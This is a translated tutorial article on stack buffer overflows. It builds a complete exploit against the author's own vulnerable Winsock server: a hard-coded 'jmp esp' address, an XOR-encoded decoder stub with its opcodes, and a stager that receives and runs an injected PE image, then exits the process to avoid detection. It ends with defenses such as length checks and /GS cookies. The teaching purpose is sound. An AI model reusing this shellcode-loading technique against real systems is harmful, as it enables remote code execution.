Buffer Overflow: Attack and Defense
For a long time, in the popular mind, "hackers" and virus writers have been surrounded by a mysterious aura. The media portray them as technical experts or technical geniuses, so some people try to prove their own "genius" status by going down the wrong road, even breaking the law. I remember a case I saw not long ago: a graduate student in computer science broke into a commercial website and deleted all of its data. Interviewed by reporters in prison, he said he was proud of what he had done, because it proved his ability and gave him a sense of achievement.
The buffer overflow attack this article discusses is actually a very "old" technique, but its destructive power should not be underestimated; I think none of us has forgotten the "Shock Wave" (Blaster) worm of a few months ago. The code in this article is very close to a real virus, and some of the techniques may be new to you, but I can say responsibly that no advanced technology is used: I did not enter ring 0, I did not write a device driver, and even the assembly code consists of only 11 very simple instructions. I hope this article gives people a new understanding of "hackers" and virus writers and "pulls" them down from the altar. I also want to remind everyone to take that "graduate student" as a lesson and not to abuse this technique; those who play with fire get burned. Now let us get into the subject.
What is a buffer overflow
You must have used strcpy to copy strings. So what happens if the destination buffer is shorter than the source string? Right: the surplus characters of the source overwrite other data of the process. This phenomenon is called a buffer overflow. Depending on where the overwritten data lives, buffer overflows are divided into three kinds: static storage overflow, stack overflow and heap overflow. After an overflow the process can behave in one of three ways: (1) it keeps running normally, because the overwritten data was not in use and no illegal access occurred; (2) it runs into errors, including wrong output and illegal-operation (access violation) errors; (3) it is attacked and starts executing malicious code; in this case what is overwritten, and what it is overwritten with, have been carefully designed by the attacker.
Under normal circumstances overflows in the static storage area and on the heap are unlikely to be exploitable. Overflows on the stack, however, are very dangerous, so we take a stack buffer overflow as our example.
Principle of the attack
To attack, we first need a target. So I wrote a program called "victim" to serve as the target; it is logically equivalent to the following code:
#include <winsock2.h>
#include <stdio.h>

void GetComputerName(SOCKET sck, LPSTR szComputer)
{
    char szBuf[512];
    recv(sck, szBuf, sizeof(szBuf), 0);
    LPSTR szFileName = szBuf;
    while ((*szFileName) == '\\')            // skip the leading "\\" of the UNC path
        szFileName++;
    while ((*szFileName) != '\\' && (*szFileName) != '\0')
    {
        *szComputer = *szFileName;           // no check against the size of szComputer
        szComputer++;
        szFileName++;
    }
    *szComputer = '\0';
}

void ShowComputerName(SOCKET sck)
{
    char szComputer[16];
    GetComputerName(sck, szComputer);
    // mov  ecx, dword ptr [esp+4]
    // sub  esp, 10h                 ; --- 2
    // lea  eax, [esp]
    // push eax
    // push ecx
    // call GetComputerName (401000h)
    printf(szComputer);
    // lea  edx, [esp]
    // push edx
    // call printf (401103h)
}
// add  esp, 14h
// ret  4                            ; --- 3

int __cdecl main(int argc, char *argv[])
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    struct sockaddr_in saServer;
    saServer.sin_family = AF_INET;
    saServer.sin_port = 0xA05B;              // htons(23456)
    saServer.sin_addr.s_addr = ADDR_ANY;
    SOCKET sckListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    bind(sckListen, (sockaddr *)&saServer, sizeof(saServer));
    listen(sckListen, 2);
    SOCKET sckClient = accept(sckListen, NULL, NULL);   // --- 1
    ShowComputerName(sckClient);
    closesocket(sckClient);
    closesocket(sckListen);
    WSACleanup();
    return 0;
}
The victim program is meant to receive a file name in UNC (Universal Naming Convention) form from the network, separate out the machine name and print it on the screen. Normally a machine name is at most 16 bytes, so ShowComputerName allocates only a 16-byte buffer for szComputer, and GetComputerName does no check on the buffer length at all. Thus ShowComputerName has a buffer overflow vulnerability.
Having found the vulnerability, the next thing is to find a concrete way to attack it. Let us look at the compiled result of ShowComputerName; below each C/C++ statement, the comment gives the corresponding assembly code. Two points about this code. First, the stdcall calling convention is used here, which is the most common calling convention for Windows procedures; the examples below use it unless stated otherwise (for the meaning of and differences between calling conventions, please consult the relevant references). Second, different compilers and compiler options may not produce the same result; the attack code that follows is based on the compiled result above, so I cannot guarantee that it will also work correctly in your environment.
I have placed three labels in the program; the diagram, from left to right, shows the state of the stack and the direction of the esp register after the code at each of the three labels has executed. Each small cell represents one word, that is four bytes.

As can be seen from the diagram, when main calls ShowComputerName, the program first pushes the argument onto the stack and then pushes the return address. After entering ShowComputerName, the program adjusts the esp register again to allocate space for the local variables. When ShowComputerName returns and executes the "ret 4" instruction, the program not only jumps to the return address to continue execution but also pops the return address and the function argument off the stack, restoring the call stack to its former state.
Obviously, if the machine name in the UNC string exceeds 16 bytes, a buffer overflow occurs in ShowComputerName. For convenience of explanation, below I take the attacker's perspective and look at how to construct the string so that the program executes some "unexpected" code.
You may have noticed that ShowComputerName's return address is stored at "szComputer+16". So if we could set the return address to "szComputer+20" and, starting at "szComputer+20", fill in the data corresponding to the instructions we need, our goal would be achieved. It is good that you can think of this, but it is impossible, because we would have to construct the string in terms of the address of szComputer, and that address is not known when the string is built. So, since the direct way does not work, we have to take a roundabout route.
If you also noticed that after the cpu executes the "ret 4" instruction, esp points to "szComputer+24", then you have seen the way around it. In the vast majority of cases we can find a "jmp esp" instruction at a fixed address in the process's address space; we need only fill in the address of that instruction at "szComputer+16", and then start filling in the attack instructions from "szComputer+24". This way, when ShowComputerName returns and the cpu executes "ret 4", it then executes "jmp esp", and control passes into our hands. How about that? Very simple!
But do not be happy too early; the above is only the basic principle of a buffer overflow attack. There is always some distance between theory and practice. To really complete the attack, we still have a number of difficult problems to solve.
The first is how to handle characters that must not appear in the string. In the code above, if the string we build contains a byte of 0 or "\", GetComputerName will refuse to copy the data after it, so no byte of our "computer name" may be 0 or "\". "\" is easy to avoid, but code that "really does something" and contains no 0 byte is almost impossible. How to resolve this contradiction? The simplest method is XOR. First write the real code and compile it; I call the result stubcode. Then find a number n, 1 ≤ n ≤ 255, such that (1) n itself is allowed to appear in the string and (2) every byte of stubcode XORed with n is allowed. XORing stubcode with n byte by byte gives the converted result. Obviously, to make it possible to find such an n, stubcode must not be too long: it only makes some simple preparations and then loads the code that does the real work; that is why I call it stubcode. In fact stubcode itself needs a stub, which we may call stubstubcode; its task is to XOR the converted data with n again, byte by byte, to restore stubcode's original form, and then hand control to stubcode. Stubstubcode is very short, only about 20 bytes, and is carefully designed so that it contains no forbidden characters.
Since the preceding analysis shows that we cannot place a "jmp esp" in the string we construct and point the return address at it, the second problem is where to find a "jmp esp" instruction. You may think the process itself is the first choice, because an exe file is loaded at a fixed address, so as long as it contains that instruction, the instruction's address is fixed. But I regret to tell you that this is wrong again. Although the exe's load address does not change, it is generally low, so the high byte of any "jmp esp" address found there is certainly 0; it is not part of stubcode, and we have no way to XOR it away. If you have read my earlier article "Implementing process hiding under NT", you know that basically every process loads kernel32.dll, and its load address is fixed on a given operating system platform. Another important fact is that its load address is high enough to satisfy the requirement of no 0 bytes. So we look in kernel32.dll. Unfortunately, on my WinXP + SP1 system there is not a single "jmp esp" instruction hiding in the whole huge kernel32.dll (I have not tried other systems; interested readers can try for themselves). So I settled for second best and looked in user32.dll, which is the next most commonly loaded after kernel32.dll. Eventually I found a "jmp esp" at address 0x77D437DB.
The third problem is how stubcode calls APIs. This was also discussed in "process hiding", but the situation is different now, because stubcode has no ready-made import table; we need to build a small "import table" of our own and write it into the UNC string as a parameter for stubcode. Stubcode also needs a number of other parameters, which I call stubparam. Stubstubcode, stubparam, stubcode and the other data together form the UNC string, which is called the stub. Of course, stubparam must also be XORed or otherwise processed to avoid illegal characters.
Stubcode must also not use directly addressed instructions; the reason is obvious and the solution is simple (no need for me to say it, right?), so I will not say more.
Attack example
Our attack program is called "attacker"; when it succeeds, it pops up the message box below inside the victim process.

The attacker's first step is to send the stub (that is, the UNC string) to the victim, so first let us look at the composition of the stub, shown below:

Here padding 1 fills all the space before the return address, in this case the space occupied by szComputer; the return address is the address of the "jmp esp" instruction; padding 2 fills the space between the return address and stubstubcode, in this case the space occupied by the sck parameter; stubstubcode, stubparam and stubcode were described above; padding 3 is used to make the stub look like a normal string, for example by supplying the terminating 0 character at the end.
For convenience I defined several structures for the stub. As you can see, they are placed under the "#pragma pack" compiler directive, which fixes the byte alignment. This is very important, because it (1) reduces the size of the stub: space on the stack is limited, and the smaller the stub the better; and (2) prevents the compiler from inserting extra alignment bytes. If the compiler inserted extra bytes into STUBSTUBCODE or STUB, all our efforts would be in vain.
#pragma pack(push)
#pragma pack(1)

// Function pointer types (the "Fx" prefix); they match the Windows API signatures.
typedef HMODULE (WINAPI *FxLoadLibrary)(LPCSTR);
typedef FARPROC (WINAPI *FxGetProcAddr)(HMODULE, LPCSTR);
typedef LPVOID  (WINAPI *FxVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);

struct STUBSTUBCODE
{
    BYTE arrConst1[4];   // 0x33, 0xC9, 0x66, 0xB9
    WORD wXorSize;       // size of the data to be XOR-processed
    BYTE arrConst2[3];   // 0x8D, 0x74, 0x24
    BYTE byXorOffset;    // start of the data to be XOR-processed (offset relative to esp)
    BYTE arrConst3[4];   // 0x56, 0x8A, 0x06, 0x34
    BYTE byXorMask;      // the number used for the XOR
    BYTE arrConst4[8];   // 0x88, 0x06, 0x46, 0xE2, 0xF7, 0x8D, 0x44, 0x24
    BYTE byEntryOffset;  // entry address of STUBCODE (offset relative to esp)
    BYTE arrConst5[2];   // 0xFF, 0xD0
};

struct STUBPARAM
{
    FxLoadLibrary  fnLoadLibrary;
    FxGetProcAddr  fnGetProcAddr;
    FxVirtualAlloc fnVirtualAlloc;
    DWORD dwImageSize;
    DWORD rvaAttackerEntry;
    char szWs2_32[11];   // "ws2_32.dll"
    char szSocket[7];    // "socket"
    char szBind[5];      // "bind"
    char szListen[7];    // "listen"
    char szAccept[7];    // "accept"
    char szSend[5];      // "send"
    char szRecv[5];      // "recv"
};

struct STUB
{
    BYTE arrPadding1[18];
    DWORD dwJmpEsp;
    BYTE arrPadding2[4];
    STUBSTUBCODE ssc;
    STUBPARAM sp;
    BYTE arrStubCode[1]; // actually a variable-length array
};
#pragma pack(pop)
STUBSTUBCODE corresponds to the 11 assembly instructions mentioned at the beginning of this article. Referring to the overall structure of the stub, we can write out its concrete implementation.
          xor   ecx, ecx
          mov   cx, wXorSize               ; wXorSize: size of the data to be XOR-processed
          lea   esi, [esp + byXorOffset]   ; byXorOffset: start of the data to be XOR-processed
          push  esi
xormask:  mov   al, [esi]
          xor   al, byXorMask              ; byXorMask: the XOR mask
          mov   [esi], al
          inc   esi
          loop  xormask
          lea   eax, [esp + byEntryOffset] ; byEntryOffset: entry address of StubCode
          call  eax
The constants in it are actually replaced by variables. wXorSize is the size of the data to be XOR-processed, which is the size of stubparam plus stubcode. byXorOffset is the offset of that data from the esp register; from the structure it can be seen to equal "sizeof(STUBSTUBCODE)". At the same time, esp plus this offset is the address of STUBPARAM, and since this address must be passed to stubcode, it is pushed onto the stack immediately (see the related content below). byXorMask is the XOR mask, the number n mentioned earlier. byEntryOffset is the offset of the stubcode entry point from esp, which is "sizeof(STUBSTUBCODE) + sizeof(STUBPARAM) + 4"; the extra 4 is because of the push just performed. The first two instructions of this code could have been a single direct "mov ecx, wXorSize"; the roundabout form is used to avoid 0 characters.
Compare the structure with the code and see! The arrays in the structure correspond to the fixed parts of the compiled code, and the variables to the parts that need to be modified. This definition lets us modify stubstubcode dynamically and reduces manual maintenance of the code.
STUBPARAM defines the parameters passed to stubcode; it is relatively simple, and I believe that after reading the introduction to stubcode you will understand the meaning and role of its members. All types prefixed with "Fx" are the function pointer types of the corresponding functions; we will meet them again later.
In STUB I first fill an 18-byte array; the extra two bytes hold the "\\" at the beginning of the UNC string, which in this case is not actually necessary. arrStubCode appears to be only one byte long, but it is a variable-length array that holds stubcode and padding 3.
Now we come to the last and most important part of the stub: stubcode; its code is below.
// Function pointer types for the winsock APIs that stubcode resolves at run time.
typedef SOCKET (WINAPI *Fxsocket)(int, int, int);
typedef int    (WINAPI *Fxbind)(SOCKET, const struct sockaddr *, int);
typedef int    (WINAPI *Fxlisten)(SOCKET, int);
typedef SOCKET (WINAPI *Fxaccept)(SOCKET, struct sockaddr *, int *);
typedef int    (WINAPI *Fxsend)(SOCKET, const char *, int, int);
typedef int    (WINAPI *Fxrecv)(SOCKET, char *, int, int);
typedef void   (WINAPI *FxAttackerEntry)(LPBYTE, FxLoadLibrary, FxGetProcAddr);

void WINAPI StubCode(STUBPARAM *psp)
{
    HINSTANCE hWs2_32 = (HINSTANCE)psp->fnLoadLibrary(psp->szWs2_32);
    FxGetProcAddr fnGetProcAddr = psp->fnGetProcAddr;
    Fxsocket fnsocket = (Fxsocket)fnGetProcAddr(hWs2_32, psp->szSocket);
    Fxbind fnbind = (Fxbind)fnGetProcAddr(hWs2_32, psp->szBind);
    Fxlisten fnlisten = (Fxlisten)fnGetProcAddr(hWs2_32, psp->szListen);
    Fxaccept fnaccept = (Fxaccept)fnGetProcAddr(hWs2_32, psp->szAccept);
    Fxsend fnsend = (Fxsend)fnGetProcAddr(hWs2_32, psp->szSend);
    Fxrecv fnrecv = (Fxrecv)fnGetProcAddr(hWs2_32, psp->szRecv);
    // memory that will hold the injected image
    BYTE *buf = (BYTE *)psp->fnVirtualAlloc(NULL, psp->dwImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    SOCKET sckListen = fnsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    struct sockaddr_in saServer;
    saServer.sin_family = AF_INET;
    saServer.sin_port = 0x3930;              // htons(12345)
    saServer.sin_addr.s_addr = ADDR_ANY;
    fnbind(sckListen, (sockaddr *)&saServer, sizeof(saServer));
    fnlisten(sckListen, 2);
    SOCKET sckClient = fnaccept(sckListen, NULL, 0);
    fnsend(sckClient, (const char *)(&buf), 4, 0);   // report the image address
    DWORD dwBytesRecv = 0;
    BYTE *pos = buf;
    while (dwBytesRecv < psp->dwImageSize)
    {
        dwBytesRecv += fnrecv(sckClient, (char *)pos, 1024, 0);
        pos = buf + dwBytesRecv;
    }
    FxAttackerEntry fnAttackerEntry = (FxAttackerEntry)(buf + psp->rvaAttackerEntry);
    fnAttackerEntry(buf, psp->fnLoadLibrary, psp->fnGetProcAddr);
}

void StubCodeEnd() {}   // this function marks the end of stubcode
Stubcode uses LoadLibrary to get a handle to ws2_32.dll and then obtains the entry addresses of several API functions through GetProcAddress. It then allocates dwImageSize bytes of memory with VirtualAlloc. What is this memory for? As in "process hiding", we are going to inject another PE image, which is actually attacker itself, into the victim process; this memory holds that image, and dwImageSize is the size of the image. After that it starts listening on port 12345 until it receives attacker's connection request.
Once a connection with attacker is established, StubCode immediately sends over the address of the memory it allocated; attacker relocates a copy of itself according to that address and sends the copy back, and StubCode places it into the allocated memory. Attacker has another function, "AttackerEntry", and rvaAttackerEntry is the distance between this function's address and attacker's load address. Using this distance, StubCode can find the entry point AttackerEntry in the copy of attacker and transfer control to it. At this point StubCode has completed its mission.
The way the code uses LoadLibrary and GetProcAddress should not be unfamiliar to you; if you really do not understand it, please read "process hiding". VirtualAlloc is also located in kernel32.dll, so I take it along while I am there.
The code also has an empty function, "StubCodeEnd". Although on the surface it does nothing, it has a very important task: I use it to calculate the number of bytes StubCode occupies in memory, and from that the size of the stub, as follows:
int nStubCodeSize = (int)(((DWORD)StubCodeEnd) - ((DWORD)StubCode));
I have found no official documentation to justify doing this, but in my environment it works well!
With the stub in hand, we also need to fill in some of its fields and inject it into the victim. The injection is simple network communication, which I will not describe; just look at the filling of the data.
BOOL PrepareStub(STUB *pStub)
{
    int i, j;
    int nDisallow = sizeof(g_arrDisallow) / sizeof(g_arrDisallow[0]);
    // copy const data
    memcpy(pStub, &g_stub, sizeof(STUB));
    // prepare stub code param
    pStub->dwJmpEsp = 0x77D437DB;                          // these addresses apply to the
    pStub->sp.fnLoadLibrary = (FxLoadLibrary)0x77E5D961;   // winxp pro + sp1 system
    pStub->sp.fnGetProcAddr = (FxGetProcAddr)0x77E5B332;   // the victim runs on
    // the original text gives only "0x77E" for this address (truncated);
    // VIRTUALALLOC_ADDR is a placeholder to be filled in for the target system
    pStub->sp.fnVirtualAlloc = (FxVirtualAlloc)VIRTUALALLOC_ADDR;
    pStub->sp.dwImageSize = GetImageSize((LPCBYTE)g_hInst);
    pStub->sp.rvaAttackerEntry = ((DWORD)AttackerEntry) - ((DWORD)g_hInst);
    // copy stub code
    int nStubCodeSize = (int)(((DWORD)StubCodeEnd) - ((DWORD)StubCode));
    memcpy(pStub->arrStubCode, StubCode, nStubCodeSize);
    // find xor mask
    int nXorSize = (int)(sizeof(STUBPARAM) + nStubCodeSize);
    LPBYTE pTmp = (LPBYTE)(&(pStub->sp));
    BYTE byXorMask = GetXorMask(pTmp, nXorSize, (LPCBYTE)g_arrDisallow, nDisallow);
    if (byXorMask == g_arrDisallow[0])
        return FALSE;
    // xor it
    for (i = 0; i < nXorSize; i++)
        pTmp[i] ^= byXorMask;
    // fill stubstubcode
    pStub->ssc.wXorSize = (WORD)nXorSize;
    pStub->ssc.byXorMask = byXorMask;
    // does the stubstubcode contain a disallowed char?
    pTmp = (LPBYTE)(&(pStub->ssc));
    for (i = 0; i < (int)sizeof(STUBSTUBCODE); i++, pTmp++)
        for (j = 0; j < nDisallow; j++)
            if (*pTmp == g_arrDisallow[j])
                return FALSE;
    // make it a "valid" file name the victim wants
    strcpy((char *)(&(pStub->arrStubCode[nStubCodeSize])), g_szStubTail);
    return TRUE;
}
Here pStub points to memory allocated in advance, its size calculated beforehand, so it will certainly not overflow (we who do this sort of thing naturally solve our own problem first); g_stub is a global variable of type STUB that holds the fixed data of the stub; g_hInst is attacker's own module handle, and calling GetImageSize with it as the parameter gives the size of attacker's memory image; g_arrDisallow is a character array holding all the disallowed characters.
GetXorMask is used to calculate the XOR mask for stubparam and stubcode; its code is below:
BYTE GetXorMask(LPCBYTE pData, int nSize, LPCBYTE arrDisallow, int nCount)
{
    BYTE arrUsage[256], by = 0;
    int i, j;
    memset(arrUsage, 0, sizeof(arrUsage));
    // record every byte value that occurs in the data
    for (i = 0; i < nSize; i++)
        arrUsage[pData[i]] = 1;
    for (i = 0; i < 256; i++)
    {
        by = (BYTE)i;
        // xor mask can not be a disallowed char
        for (j = 0; j < nCount; j++)
            if (by == arrDisallow[j])
                break;
        if (j < nCount)
            continue;
        // after xor, the data should not contain a disallowed char:
        // a data byte d becomes disallowed iff d == by ^ arrDisallow[j]
        for (j = 0; j < nCount; j++)
            if (arrUsage[(BYTE)(by ^ arrDisallow[j])])
                break;
        if (j >= nCount)
            return by;
    }
    // we didn't find it; return the first disallowed char to signal an error
    return arrDisallow[0];
}
After the XOR processing, PrepareStub modifies stubstubcode according to the dynamically computed data. Because that data is worked out dynamically, a final check of stubstubcode for disallowed characters is necessary. Finally, g_szStubTail is appended to make the stub a complete UNC string, and the whole stub is declared ready. As said earlier, stubcode's task is to establish attacker's image inside the victim and then hand control to the AttackerEntry function inside it. So attacker's second task is to relocate a copy of itself and send it to stubcode. The following code completes these tasks:
...
DWORD dwNewBase, dwSize;
LPBYTE pImage;
recv(sck, (char *)(&dwNewBase), sizeof(DWORD), 0);
dwSize = GetImageSize((LPCBYTE)g_hInst);
pImage = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
memcpy(pImage, (const void *)g_hInst, dwSize);
RelocImage(pImage, (DWORD)g_hInst, dwNewBase);
DoInject(sck, pImage, dwSize);
...
Attacker first obtains from stubcode the starting address of the memory it allocated; this address is where attacker's image will sit inside the victim. Attacker then makes a copy of itself and relocates this copy according to the new image address; the RelocImage code is basically the same as in "process hiding" and is not repeated here. But note: by default the linker does not generate a relocation table for an EXE file, so when linking attacker the parameter "/FIXED:NO" must be added to force the linker to generate one. DoInject finishes sending the data; it is simple network communication and I will pass over it.
Inside the victim, control will eventually be transferred to the function below.
// The first line of this function was cut off in the original; the parameter list is
// reconstructed from the call in StubCode: fnAttackerEntry(buf, psp->fnLoadLibrary, psp->fnGetProcAddr).
void WINAPI AttackerEntry(LPBYTE pImage, FxLoadLibrary fnLoadLibrary,
                          FxGetProcAddr fnGetProcAddr)
{
    g_hInst = (HINSTANCE)pImage;
    if (LoadImportFx(pImage, fnLoadLibrary, fnGetProcAddr))
        AttackerMain(g_hInst);
    ExitProcess(0);
}
It is like ThreadEntry in "process hiding"; the biggest difference is the final call to ExitProcess, which ends the victim's life. This is easy to understand: after the series of attacks the victim's stack is battered beyond recognition, and if AttackerEntry returned normally, the victim would certainly pop up an illegal-operation dialog box. We are doing "a bad thing" and do not want to be discovered, so letting the victim quietly exit is the best option.
LoadImportFx is exactly the same as in "process hiding" and will not be repeated. As for AttackerMain, mine looks like the following. You can adapt it as you like, but please keep in mind your promise to everyone!
DWORD WINAPI AttackerMain(HINSTANCE hInst)
{
    TCHAR szName[64], szMsg[128];
    GetModuleFileName(NULL, szName, sizeof(szName) / sizeof(TCHAR));
    _stprintf(szMsg, _T("process \"%s\" has a buffer overflow vulnerability, patch it immediately!"), szName);
    MessageBox(NULL, szMsg, _T("You"), MB_OK | MB_ICONINFORMATION);
    return 0;
}
Defensive measures
Although there are many ways to attack with a buffer overflow, it is not hard to prevent. The simplest and most effective method is to be careful when writing code. For example, in victim, if we pass GetComputerName an extra parameter giving the length of the buffer, and GetComputerName checks it, the tragedy can be avoided.
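As an added example (not code from the original article), here is the length-checked version of GetComputerName the text calls for, written as a plain C function that takes the received bytes as input instead of reading from a socket. The function name, the return codes and the inputs are my own; the parsing rules (skip leading backslashes, stop at the next backslash or NUL) are the victim's.

```c
#include <stddef.h>
#include <string.h>

/* Return codes (assumed names, not from the article). */
enum { NAME_OK = 0, NAME_TOO_LONG = -1, NAME_EMPTY = -2 };

/*
 * Hardened counterpart of the article's GetComputerName: copies the machine-name
 * part of a UNC path (the text between the leading backslashes and the next
 * backslash) into dst, never writing more than dstlen bytes including the NUL.
 * srclen bounds the read side too, because bytes received from a socket are not
 * guaranteed to contain a terminating NUL.
 */
int get_computer_name_safe(const char *src, size_t srclen,
                           char *dst, size_t dstlen)
{
    size_t i = 0, n = 0;

    if (dst == NULL || dstlen == 0)
        return NAME_TOO_LONG;            /* no room even for the terminator */
    dst[0] = '\0';

    /* Skip the leading backslashes of "\\server\share\file". */
    while (i < srclen && src[i] == '\\')
        i++;

    /* Copy until a backslash, a NUL, or the end of the received bytes. */
    while (i < srclen && src[i] != '\\' && src[i] != '\0') {
        if (n + 1 >= dstlen) {           /* next byte would leave no room for NUL */
            dst[0] = '\0';
            return NAME_TOO_LONG;        /* reject rather than overflow */
        }
        dst[n++] = src[i++];
    }
    dst[n] = '\0';
    return n == 0 ? NAME_EMPTY : NAME_OK;
}

/* Constructed input: a 32-character "machine name" aimed at the victim's 16-byte buffer. */
int demo_overlong_name_is_rejected(void)
{
    char name[16];
    const char *attack = "\\\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\share";
    return get_computer_name_safe(attack, strlen(attack), name, sizeof name) == NAME_TOO_LONG;
}
```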
If you are lazy and do not want to do these chores, the compiler can help you. Starting with VS.NET the compiler has a new option, /GS. With it enabled, the compiler checks every function for the possibility of an overflow; if there is one, it inserts checking code into the function. For example, after ShowComputerName is processed, it becomes something like the following. __security_cookie is a global variable inserted by the compiler; when the process starts it is initialized by a hash over a wealth of information, so its value is well randomized (for the specific initialization see "seccinit.c").
void ShowComputerName(SOCKET sck)
{
    DWORD_PTR cookie = __security_cookie;   // code inserted by the compiler
    char szComputer[16];
    RecvComputerName(sck, szComputer);
    printf(szComputer);
    __security_check_cookie(cookie);        // code inserted by the compiler
}
As the code shows, the first thing the program does after entering ShowComputerName is to copy the value of __security_cookie into the local variable cookie. Note that cookie is a local variable of ShowComputerName, so on the stack it sits between the return address and the other local variables. If copying the string into szComputer overflows the buffer, cookie is certainly overwritten before the return address is, and its new value will almost never equal __security_cookie, so the final __security_check_cookie function can detect the overflow with the code below (this is not the code used on x86 cpus, but it is easier to understand and logically there is no difference; see "secchk.c" for details).
void __fastcall __security_check_cookie(DWORD_PTR cookie)
{
    /* Immediately return if the local cookie is OK */
    if (cookie == __security_cookie)
        return;
    /* Report the failure */
    report_failure();
}
The whole implementation is simple and efficient; why not try it and see the result. But this mechanism has its shortcomings: first, once an overflow is detected the program terminates; second, not every overflow is caught, and some slip through. Please refer to the relevant references and experiment for yourself.
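To make the ordering argument above concrete, here is an added example (not from the article or the compiler's runtime) that models ShowComputerName's /GS frame as a struct laid out in the order the text describes: buffer, then cookie, then return address. The struct, the fixed stand-in cookie value and the function names are my own assumptions; the check itself is the one from __security_check_cookie.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the frame: an overflow of szComputer must pass through
 * cookie before it can reach ret_addr, which is what makes the check work. */
struct gs_frame {
    char     szComputer[16];
    uint32_t cookie;      /* copy of __security_cookie made on function entry */
    uint32_t ret_addr;    /* saved return address, the attacker's real target */
};

/* Stands in for __security_cookie (fixed here; randomized at start-up on Windows). */
#define SECURITY_COOKIE 0xBB40E64Eu

/* Models the function prologue: DWORD_PTR cookie = __security_cookie; */
void gs_frame_enter(struct gs_frame *f, uint32_t ret_addr)
{
    memset(f->szComputer, 0, sizeof f->szComputer);
    f->cookie = SECURITY_COOKIE;
    f->ret_addr = ret_addr;
}

/* Models the unchecked copy into szComputer: len bytes are written starting at
 * the buffer, however long the name is. The write is clamped to the frame so
 * that this model itself stays in bounds. */
void gs_frame_unchecked_copy(struct gs_frame *f, const char *name, size_t len)
{
    size_t room = sizeof *f - offsetof(struct gs_frame, szComputer);
    if (len > room)
        len = room;
    memcpy((unsigned char *)f + offsetof(struct gs_frame, szComputer), name, len);
}

/* __security_check_cookie: 1 if the frame is intact, 0 if an overflow was detected. */
int gs_check_cookie(const struct gs_frame *f)
{
    return f->cookie == SECURITY_COOKIE;
}

/* Walks the article's scenario: a normal name passes, an over-long one is caught
 * before the corrupted return address can be used. Returns 1 if so. */
int gs_demo(void)
{
    struct gs_frame f;
    char attack[24];
    memset(attack, 'A', sizeof attack);       /* constructed over-long "name" */

    gs_frame_enter(&f, 0x00401234u);
    gs_frame_unchecked_copy(&f, "server", 7); /* 6 chars + NUL: fits */
    if (!gs_check_cookie(&f))
        return 0;

    gs_frame_enter(&f, 0x00401234u);
    gs_frame_unchecked_copy(&f, attack, sizeof attack);
    /* ret_addr is now 0x41414141, but so is cookie: the check fails and the
     * process is terminated instead of returning through the bad address. */
    return !gs_check_cookie(&f) && f.ret_addr == 0x41414141u;
}
```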
Whose fault is it?
It is said that more than 50% of the security holes found have a buffer overflow as their root cause. Whether or not this figure is accurate, it shows the seriousness of the harm buffer overflows cause to the computer world. People generally think that so many holes exist because programmers are "careless". But should programmers really bear the responsibility? I think not. First, the design of the x86 cpu has some problems: the function return address is kept on the same stack as ordinary data, which gives an attacker the opportunity to overwrite it, and the stack's growth from high to low addresses greatly increases this risk. Second, the C standard was designed and implemented for efficiency without regard to memory safety, creating many dangerous functions like strcpy. Of course, I do not mean to accuse their designers; I am not qualified to, I just want to discuss the buffer overflow problem more deeply.
Note: overwriting the return address with the address of a "jmp esp" instruction to seize control is the most typical kind of buffer overflow attack. Under specific circumstances there are many other methods,







